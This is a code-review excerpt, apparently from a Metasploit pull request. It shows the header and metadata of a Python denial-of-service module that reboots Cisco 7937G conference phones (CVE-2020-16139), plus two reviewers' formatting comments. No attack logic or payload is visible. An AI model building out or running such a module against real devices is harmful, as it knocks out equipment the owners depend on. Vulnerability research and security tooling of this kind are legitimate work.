modules/auxiliary/dos/cisco/CVE-2020-16139.py

```diff
@@ -0,0 +1,74 @@
+# Exploit Title: Cisco 7937G DoS 1 MSF Module
+# Date: 2020-08-10
+# Exploit Author: Cody Martin
+# Author Homepage: debifrank.github.io
+# Organization: BlackLanternSecurity
+# Org. Homepage: BlackLanternSecurity.com
+# Vendor Homepage: https://cisco.com
+# Version: <=SCCP-1-4-5-7
+# Tested On: SCCP-1-4-5-5, SCCP-1-4-5-7
+# CVE: CVE-2020-16139
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+# standard modules
+from metasploit import module
+import logging
+
+# extra modules
+dependencies_missing = False
+try:
+    import requests
+except ImportError:
+    dependencies_missing = True
+
+
+metadata = {
+    'name': 'Cisco 7937G Denial-of-Service Reboot Attack',
+    'description': '''
+        DoS reset attack
+    ''',
+    'authors': [
+        'Cody Martin'
+    ],
+    'date': '2020-06-02',
+    'license': 'GPL_LICENSE',
+    'references': [
+        {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'},
+        {'type': 'cve', 'ref': '2020-16139'},
+        {'type': 'edb', 'ref': '#'}
+    ],
+    'type': 'dos',
+    'options': {
+        'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': 'None'}
```

Comment:
This is very hard to read. Please put each element and its value on a separate line for easier readability.

Reply:
Your trailing `}` should be indented to match the indentation of the rest of your code for readability. Other than that this looks fine now.